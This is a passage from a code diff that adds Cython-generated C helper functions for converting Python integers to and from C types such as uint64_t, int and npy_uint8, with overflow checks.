(((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint64_t) (((uint64_t)-1)*(((((((uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(uint64_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint64_t) ((((((((uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(uint64_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint64_t) (((uint64_t)-1)*(((((((((uint64_t)digits[3]) << PyLong_SHIFT) | (uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(uint64_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint64_t) ((((((((((uint64_t)digits[3]) << PyLong_SHIFT) | (uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(uint64_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint64_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint64_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint64_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + uint64_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (uint64_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (uint64_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint64_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (uint64_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (uint64_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(uint64_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((uint64_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(uint64_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((uint64_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((uint64_t) 1) << (sizeof(uint64_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (uint64_t) -1; + } + } else { + uint64_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (uint64_t) -1; + val = __Pyx_PyInt_As_uint64_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to uint64_t"); + return (uint64_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to uint64_t"); + return (uint64_t) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ + static CYTHON_INLINE PyObject* __Pyx_PyInt_From_npy_uint8(npy_uint8 value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const npy_uint8 neg_one = (npy_uint8) -1, const_zero = (npy_uint8) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(npy_uint8) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(npy_uint8) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(npy_uint8) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(npy_uint8) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(npy_uint8) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(npy_uint8), + little, !is_unsigned); + } +} + +/* CIntFromPy */ + static CYTHON_INLINE npy_uint8 __Pyx_PyInt_As_npy_uint8(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const npy_uint8 neg_one = (npy_uint8) -1, const_zero = (npy_uint8) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(npy_uint8) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(npy_uint8, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (npy_uint8) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(npy_uint8) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) >= 2 * PyLong_SHIFT)) { + return (npy_uint8) (((((npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(npy_uint8) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) >= 3 * PyLong_SHIFT)) { + return (npy_uint8) (((((((npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(npy_uint8) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) >= 4 * PyLong_SHIFT)) { + return (npy_uint8) (((((((((npy_uint8)digits[3]) << PyLong_SHIFT) | (npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (npy_uint8) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(npy_uint8) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(npy_uint8, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(npy_uint8) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(npy_uint8, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(npy_uint8) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 2 * PyLong_SHIFT)) { + return (npy_uint8) (((npy_uint8)-1)*(((((npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(npy_uint8) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 2 * PyLong_SHIFT)) { + return (npy_uint8) ((((((npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(npy_uint8) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 3 * PyLong_SHIFT)) { + return (npy_uint8) (((npy_uint8)-1)*(((((((npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(npy_uint8) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 3 * PyLong_SHIFT)) { + return (npy_uint8) ((((((((npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(npy_uint8) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 4 * PyLong_SHIFT)) { + return (npy_uint8) (((npy_uint8)-1)*(((((((((npy_uint8)digits[3]) << PyLong_SHIFT) | (npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(npy_uint8) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(npy_uint8, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(npy_uint8) - 1 > 4 * PyLong_SHIFT)) { + return (npy_uint8) ((((((((((npy_uint8)digits[3]) << PyLong_SHIFT) | (npy_uint8)digits[2]) << PyLong_SHIFT) | (npy_uint8)digits[1]) << PyLong_SHIFT) | (npy_uint8)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(npy_uint8) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(npy_uint8, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(npy_uint8) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(npy_uint8, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + npy_uint8 val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (npy_uint8) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (npy_uint8) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (npy_uint8) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (npy_uint8) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (npy_uint8) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(npy_uint8) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) 